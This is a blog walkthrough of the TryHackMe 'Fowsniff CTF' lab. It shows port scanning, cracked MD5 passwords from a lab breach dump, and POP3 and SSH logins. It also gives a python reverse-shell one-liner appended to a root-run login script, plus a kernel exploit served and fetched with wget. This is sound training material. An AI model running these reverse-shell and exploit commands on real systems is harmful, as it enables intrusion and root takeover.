Tryhackme - Fowsniff CTF

Tryhackme – Fowsniff CTF

In this walk through, we will be going through the Fowsniff CTF room from Tryhackme. This room is rated as Easy on the platform and we have to enumerate the machine by finding open ports, do some online research, decode hashes, brute force a pop3 login and much more. So, let’s get started without any delay.

Fowsniff CTF

Machine Info:

TitleFowsniff 1
IPaddress10.10.102.132
DifficultyEasy
ObjectiveHack this machine and get the flag. There are lots of hints along the way and is perfect for beginners!

Enumeration:

  • I started off with a regular nmap scan with service version detection. Found 3 ports opened – 80 (HTTP), 110 (POP3) and IMAP (143).

sudo nmap -sS -sV 10.10.102.132

nmap scan

  • I looked into the webserver running on port 80 and found out that the Fowsniff corp has been breached and a temporary SSH access has been deployed to resolve the issue.

Fowsniff Corp

Fowsniff breached

  • As per the hint, i looked the twitter account of the company which the attacker has hijacked and got the link of the pastebin containing the breached data.

FowSniffCorp Pwned Twitter

Twitter post regarding breach

  • For some reason the breached data has been deleted by the Pastebin. However, as per the another link in the account’s bio, a backup for the same can be found on a github repo.

-> https://pastebin.com/NrAqVeeX

Pastebin Not found

-> https://pastebin.com/378rLnGi

Pastebin dump

  • Found the breached data in the backup github repo. The contains email address and password hashes. Attacker has also hinted that the hashed password is MD5. So, let’s crack these without any delay.

-> https://raw.githubusercontent.com/berzerk0/Fowsniff/main/fowsniff.txt

fowsniff.txt

  • I used crackstation to crack the below MD5 hashes for all the users except the user stone.

mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4 -> mailcall
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56 -> bilbo101
tegel@fowsniff:1dc352435fecca338acfd4be10984009 -> apples01
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb -> skyler22
seina@fowsniff:90dc16d47114aa13671c697fd506cf26 -> scoobydoo2
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b -> carp4ever
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11 -> orlando12
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e -> 07011972

Password cracking

  • Next, i logged into the POP3 server using the creds of user seina.

wh1terose@fsociety:~/CTF/TryHackme/Fowsniff$ telnet 10.10.102.132 110
Trying 10.10.102.132...
Connected to 10.10.102.132.
Escape character is '^]'.
+OK Welcome to the Fowsniff Corporate Mail Server!
USER seina
+OK
PASS scoobydoo2
+OK Logged in.

pop3 login

  • Once i got into the server, I list out all the messages of the user seina. Among them i found out an email from baksteen about the concerned breach and a temporary SSH password was included in the mail body.

LIST messages

SSH password

  • SSH Password – S1ck3nBluff+secureshell

Initial Access:

  • Using the username of the sender of the email and found SSH password, i logged into the server via SSH and got the initial foothold.

ssh login

  • Next, as required by the task list, i checked the groups the current user is associated with and found out that it belongs to group “users”.

id

id

  • Let’s find out which files users of group “users” can access. There is a file named cube.sh in the /opt/cube directory which we can access and it seems interesting to tinker with.

find / -group users 2>/dev/null

find files owned by group

Privilege escalation:

  • Now for the privilege escalation, i initially took the route that the task list has suggested. I used the below python payload. Appended in the cube.sh file as the cube.sh file is being run by the 00-header file as a part of it and displays the login banner whenever a user connects via SSH. As per the task list, we have to set up a listener using netcat and as soon as the user logs into via SSH again, the cube.sh script will run as root as part of the 00-header and will give us root access. However, it does not seems to work in my case.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((10.18.1.78,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

cube.sh

/etc/update-motd.d

  • So, i tried a different route. On checking the kernel version of the machine, found out that it is using an old kernel. There might be some exploits available affecting that.

uname -a

uname -a

  • I checked searchsploit for this and got a hit. We have a Local Privilege escalation exploit. Bingo!

searchsploit 4.4.0-116

searchsploit -m linux/local/44298.c

searchsploit Local Privilege Escalation exploit

  • I compiled the exploit and set up an HTTP server using python to serve it.

python3 -m http.server

python HTTP server

gcc 44298.c -o exploit

compiling exploit

  • Downloaded the exploit using wget on the target machine.

wget http://10.18.1.78:8000/exploit

downloading the exploit

  • Execute the exploit and get root. Captured the flag and completed the room.

root flag

Task 1 – Hack into the FowSniff organisation.

Task 1 - Hack into the FowSniff organisation.

Task 1 - Hack into the FowSniff organisation.

Also Read: Tryhackme – ColddBox (Easy)

Conclusion:

Conclusion

So that was “Fowsniff CTF” for you. We started off with a regular nmap scan and found three ports opened – 80 (HTTP), 110 (POP3) and 143 (IMAP). Next, enumerated the Web server on port 80 and found that the Fowsniff servers has been breached and hacker had dumped the passwords online. We searched for the organization twitter account which also was breached as per the notice on the website. There found the pastebin dump containing the creds. Moving on, cracked the passwords using Crackstation. Further, with the cracked password of user Seina, logged into the pop3 server and got the temporary user password of user baksteen. At last, escalated our privileges by exploiting a Local privilege escalation bug in the Linux kernel and got the root flag. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top